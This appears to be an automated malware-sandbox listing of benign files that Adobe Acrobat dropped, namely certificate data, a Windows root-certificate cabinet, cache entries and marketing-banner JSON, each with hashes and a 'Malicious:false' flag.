                                                                  Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                  Category:dropped
                                                                  Size (bytes):71954
                                                                  Entropy (8bit):7.996617769952133
                                                                  Encrypted:true
                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                  Malicious:false
                                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):192
                                                                  Entropy (8bit):2.752969867432539
                                                                  Encrypted:false
                                                                  SSDEEP:3:kkFklk5eSkfllXlE/HT8kSzlXNNX8RolJuRdxLlGB9lQRYwpDdt:kK95e2T8v7NMa8RdWBwRd
                                                                  MD5:93C4B92B4B46995C7030ACDAEB5CC726
                                                                  SHA1:229E3534900F8B694DD6E0C6833797AA817DDE5D
                                                                  SHA-256:9D17751F3720C93CD1765C4185DEABD43E111D85A3D67B9B5EEEBB139F5A9704
                                                                  SHA-512:E3734CDD49E47C53FBCB13F9365F22B219DEB7E924938A0BEC97EE2969AD7933DE75390FC11D263CDEAA464776F13E913BD3CECC9B542C60D7DC68B369CCC145
                                                                  Malicious:false
                                                                  Preview:p...... ...........r7U..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):328
                                                                  Entropy (8bit):3.226293701622254
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKBi9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:vDImsLNkPlE99SNxAhUe/3
                                                                  MD5:ACA30E2E8EB1EE49284312D5F1190FB8
                                                                  SHA1:DA48C97D90351A9CF0F747E217E7FD31808065C6
                                                                  SHA-256:5D622D5DFEDCC281350B2784261219D8A55521C0B33320A4165FCDFA3ADFC992
                                                                  SHA-512:C52419ADCC435EAD3C60A82BDA1EA3A1457565A036E956F5790C6A7AD5E63954DDAC75932F11AE40B8A8EEFDC8843F214F1F52323FD2D7EAF3FB5318E09B1BA3
                                                                  Malicious:false
                                                                  Preview:p...... ...........t7U..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):295
                                                                  Entropy (8bit):5.33345728712073
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJM3g98kUwPeUkwRe9:YvXKX+lIM1UYpW7PZGMbLUkee9
                                                                  MD5:A07A987060B8553FA1797831BE445923
                                                                  SHA1:3C97D45F500B4647C66C99DAB0FA230D61D20D4E
                                                                  SHA-256:2F8101F2811FD61D50DD76D30C7DD10EC211730C8A8458DF05BEA047048BFADB
                                                                  SHA-512:90E357B992DFFD9CE6A2C39A5B8349591EF86322583F184EF21CFB5D5B64E3682760AC1588B4B2B93D44E2351A9530C75975C18E1AFA216198E073E5DEBE8F05
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):294
                                                                  Entropy (8bit):5.2688417210468685
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJfBoTfXpnrPeUkwRe9:YvXKX+lIM1UYpW7PZGWTfXcUkee9
                                                                  MD5:6711A0C1670E8744F55F87DCAA972BED
                                                                  SHA1:1AA04C867BBFCFBC27D76EDEF80E1C9B1D54F8DD
                                                                  SHA-256:89FD9D31C2E3C32F52C9C6CD2BA1CD7E502A2CF67381BD0C73F505DE3E50B38F
                                                                  SHA-512:B3315C54D9BD07D5515C2141A9AC98B781628E16B9B23CE46F998961D5F04171BE1564037CAFFD6C6D71BE6F9FF958BFE778804DE83282FC10D29D85A818F4B7
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):294
                                                                  Entropy (8bit):5.248109514961539
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJfBD2G6UpnrPeUkwRe9:YvXKX+lIM1UYpW7PZGR22cUkee9
                                                                  MD5:7BB0EA038507CD4C39FF4A18C7CA2A1E
                                                                  SHA1:878C0191C6B4B9222F09F0267D6D7F9300195064
                                                                  SHA-256:AB03450810C070D9E627AD7D2574BFE0914B33A4A8A1CD469A06745E91ADB7C7
                                                                  SHA-512:19A1EF192698419B66BF887DFAD408D7792D3C4F2F7A9FBD61F07EA8B8E01C13F7E2AADCC509E32E7490E0BD92A3C1A56641EA4465421CCA308503FD9942DC64
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):285
                                                                  Entropy (8bit):5.311300827960755
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJfPmwrPeUkwRe9:YvXKX+lIM1UYpW7PZGH56Ukee9
                                                                  MD5:E0EB9F30A616158657FCD8F7C77E2F3E
                                                                  SHA1:359A7EC12A243FADB7636F34351DDAF331149C26
                                                                  SHA-256:8B200B953F40C0CF98EC29056E685CECE40B68B14EC7F4DC859EAA8388126A64
                                                                  SHA-512:5DC398EE9027235B1C185C7F793720DE402D758788EF91AACDD4182E0E1DAD8BD2420BB09754E7A512512BFD040D39485BA38E04D98B3EF89C29A0DE43DD2159
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):1123
                                                                  Entropy (8bit):5.687721305319971
                                                                  Encrypted:false
                                                                  SSDEEP:24:Yv6X+lx1FiP+pLgE9cQx8LennAvzBvkn0RCmK8czOCCSGl:YvNrSGhgy6SAFv5Ah8cv/q
                                                                  MD5:26995C00E26619BDE83DFD51032F9B5E
                                                                  SHA1:4566D664F5ED88544AE7115ADD61006B6DB17E86
                                                                  SHA-256:4E0D6705EFA91B72D5E352E2B9FEDDE2217D16DF7688AB635C9A4537D50914CF
                                                                  SHA-512:10ACCE8D9270D6805C6121879992077610697793C44CCF032DFE0A634E3CBCFFE25F8BF6EDACBC100C7B59C5721D913B38ACEC1B903D9DCFA486A974E31157F4
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):289
                                                                  Entropy (8bit):5.25653855003184
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJf8dPeUkwRe9:YvXKX+lIM1UYpW7PZGU8Ukee9
                                                                  MD5:2F8DF28F363749CAE126856A2856A1D7
                                                                  SHA1:C987B8281DBB2D5A4E45EA4901DC86D9EAB3CC07
                                                                  SHA-256:F9B0636868EADF53BE33ED06CB4CA868DFC0CE070565E30CFABA0B7678F1CA25
                                                                  SHA-512:C24E1BDF2102C1E836F554B6A42667F3B09A6BAA8B2D009EF711A20785B98B914D2B2663DF7F0C36B0E73FB2FB847F38C349913993F6F6E860EE609F0CD9D5ED
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):292
                                                                  Entropy (8bit):5.257683844467374
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJfQ1rPeUkwRe9:YvXKX+lIM1UYpW7PZGY16Ukee9
                                                                  MD5:C3B6F4EDABED24E21F0E2A903B4A7515
                                                                  SHA1:621A7988DFA8980F7C78B6021C770ABDB3BCB1EA
                                                                  SHA-256:4CB55A5433149FA21E8184280E8992D53F9783030AEFCED7735E507066D011B1
                                                                  SHA-512:F83C03FFC780AFFE4A42FDF781112932426C04626A63F723E545C78F4C679D8F4FE5E84E4A88CBDFB1C3C86ADB2B2537F11EBEAA7B2598AB4246424C46A942C0
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):289
                                                                  Entropy (8bit):5.277560741175454
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJfFldPeUkwRe9:YvXKX+lIM1UYpW7PZGz8Ukee9
                                                                  MD5:9FC2D5F8BC2FCEEA7786EB3A75E38668
                                                                  SHA1:FE8F2A71B98FDB231C7CED60759FD8BB4E045B01
                                                                  SHA-256:DAB6997AE1423EFE5C3C2078369947FD5411541B28C9B8E7B0C22516C5A1311C
                                                                  SHA-512:09A8B55B80AB3DF56BEF5332532B7166ED46FFE7886DC23A4F2D50F8A77900518F6C53D368F3E249BC8B792B61672357561FEAE1CC880989DE7B574F85BAACE3
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):295
                                                                  Entropy (8bit):5.283827244682039
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJfzdPeUkwRe9:YvXKX+lIM1UYpW7PZGb8Ukee9
                                                                  MD5:EABC19D87CD88006717AFB875EB61635
                                                                  SHA1:D24FBEC0CB2C27A462BD9AB17459A1F1F27A355A
                                                                  SHA-256:DBE33B19C697CFAC1A7CF497DD4CBC048B3DB46CECB967AB1D4B3265E2CF9D33
                                                                  SHA-512:D1C537A7DD424120A7DC12C4DBF40ACB845F505D14341C7CFA459F4C50E27044E34FE1B3AE53F03388005A7C8F7914C0ECCAB46A573537D88847149685F9EC65
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):289
                                                                  Entropy (8bit):5.263733208018288
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJfYdPeUkwRe9:YvXKX+lIM1UYpW7PZGg8Ukee9
                                                                  MD5:DF97776F505980EC70CBA415B5E780E4
                                                                  SHA1:7978840122238FB6687B0B8A5356FF01D63624A0
                                                                  SHA-256:E007E9A7FBF1E2C3F68662D22511E63D55EAF1906033D630F56F5AEA9366B2D2
                                                                  SHA-512:D9D5235B9411D4EAB97AB4CB7481A39560C097D83AC8AB5877D7E1B4C83E4740CB1A33F174D10AA9A5789CC46199F49E37BA71093F2FAD8A8695BEB3CB6B2A3D
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):284
                                                                  Entropy (8bit):5.249726434602789
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJf+dPeUkwRe9:YvXKX+lIM1UYpW7PZG28Ukee9
                                                                  MD5:9D24C76B4ECDA2CA7B73E3C5F5709CFA
                                                                  SHA1:442FE46644D9410C0D608BD6FE961140684F55BD
                                                                  SHA-256:B73A7935390F987FF29028B510C9F1407CFF4764D387125B79F4E60D248E8E0A
                                                                  SHA-512:88A7B49DE860DA743E505806A1E018910AE72B88A6D41C90304CCDFBD577E9128478E6D12778F2C50D676900205BB0E0FFE14CDB82BEEF29B8AB0D0861AD59F6
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):291
                                                                  Entropy (8bit):5.2475295619944315
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJfbPtdPeUkwRe9:YvXKX+lIM1UYpW7PZGDV8Ukee9
                                                                  MD5:0660B09A3A2C39A47A5399B9AD23556F
                                                                  SHA1:9E7E30C3E2DAD0817565CD0F5E538D616B61450C
                                                                  SHA-256:E32F158CD36452A854A7E4A3D85DF7281233CC4A517962C116823B86EE935C1C
                                                                  SHA-512:76346C7A299AE91FFFABDE58A5C1C4AA9D31B39A063A071F0FB510AF4F5C0A1866817EA3F757A1F677753B6130BA24A3646215C8A88FFA14ACC451FFA354D14F
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):287
                                                                  Entropy (8bit):5.248700794717795
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJf21rPeUkwRe9:YvXKX+lIM1UYpW7PZG+16Ukee9
                                                                  MD5:48BD44F864B6DF3D4FDA9F52C63C6EEF
                                                                  SHA1:B0805877A885130117D9FA3B130010AD30E266E8
                                                                  SHA-256:66D42F39B2F04D85A8FF4D72F419BD9EBECF70C1E3C7029AFE1DE23FC22D5261
                                                                  SHA-512:AB917C870623BD9AB7AC19D1B2587C6A9B277B369F202D5C432AF9292E843B4DF5F3D48C1694A32E57EBFF42BC5E3B29CDE4929EF8A60E0F9D12E8E85C7C3E9E
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):1090
                                                                  Entropy (8bit):5.660502582886618
                                                                  Encrypted:false
                                                                  SSDEEP:24:Yv6X+lx1FiPiamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSGl:YvNrSUBgkDMUJUAh8cvMq
                                                                  MD5:D11A7539CB9820D662698183215E945E
                                                                  SHA1:A0D18A89CC0A1E67D1543E68ED5D2DBDEBAA56EC
                                                                  SHA-256:2A0FFBD7DCC8C792761CE540F027A7A436D5C518578ADB226A23592ABA8B8409
                                                                  SHA-512:6B3DE62467E9FB01636870520F5AFB5EBB7B65FBE3BD5AB452F5CADA5752DE26CDDA227D3CE53F1EB406E41B94ED1B1FA4B8DBAED3839DABE0B856779024281E
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):286
                                                                  Entropy (8bit):5.224484424786322
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJfshHHrPeUkwRe9:YvXKX+lIM1UYpW7PZGUUUkee9
                                                                  MD5:157D8721440D155970E422265ACAEDD0
                                                                  SHA1:6692C8597BAD3418AB967AEB333F4ED9E252083B
                                                                  SHA-256:D9621BBC2AB9E04BB86119A8F09ED27F33AF748D37383A9F8062D960BD245A4A
                                                                  SHA-512:52409BE6BC0F51C8891B02403F0754B7C94D1CE2CB131C293FEC223142483738AECC24DA3D7CE2A4F5ED02C7F4EDDA678169B40506D5ABDBDD103AEFE559E997
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):282
                                                                  Entropy (8bit):5.242399998887142
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJTqgFCrPeUkwRe9:YvXKX+lIM1UYpW7PZGTq16Ukee9
                                                                  MD5:A3CC8CB292AD7A967FED678DDFB431B2
                                                                  SHA1:58B3446E8C498E3BA3ADD665384745E789C7292A
                                                                  SHA-256:87A66B5D6A7CD74F3BA4431FA0DC99C94D11CB9147557860676DC7C5AC051B2C
                                                                  SHA-512:C7D70546409CD6A4104CD54B7E5CE43F9953C15820691CA416A5B62A36B0278A998EC75F97BD6F066B7D028D8066C916B167EE6DE89C211AF2F310DF99B1BD58
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):4
                                                                  Entropy (8bit):0.8112781244591328
                                                                  Encrypted:false
                                                                  SSDEEP:3:e:e
                                                                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                  Malicious:false
                                                                  Preview:....
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):2814
                                                                  Entropy (8bit):5.138853476733896
                                                                  Encrypted:false
                                                                  SSDEEP:24:YDcYoaz7may3Qot84PPjM+ETc2OYPkYCKRLFjHVCj0SRdyKEI2G2LSRPP53Chswu:YDjOm2Kz1UtrvPptX+EAe95Iy
                                                                  MD5:F218F6A5400BDD77A94C14834FE32FE3
                                                                  SHA1:F59B04D3FF0717A16A82F2083507656918C5A5EA
                                                                  SHA-256:4D5B6422890DA416AE088A77D0216C631C1FFCAE927CDD2E4E9C10A42E0F5B69
                                                                  SHA-512:4C6C8F7A5C24743E1DA287537CCF22E70BC6760B4D6A3A6B41D84504AC35590E10ABE19BB4EC96A517DE6C97FB1C6F1056D3D117EE16B3848CDE44ECC067FBB8
                                                                  Malicious:false
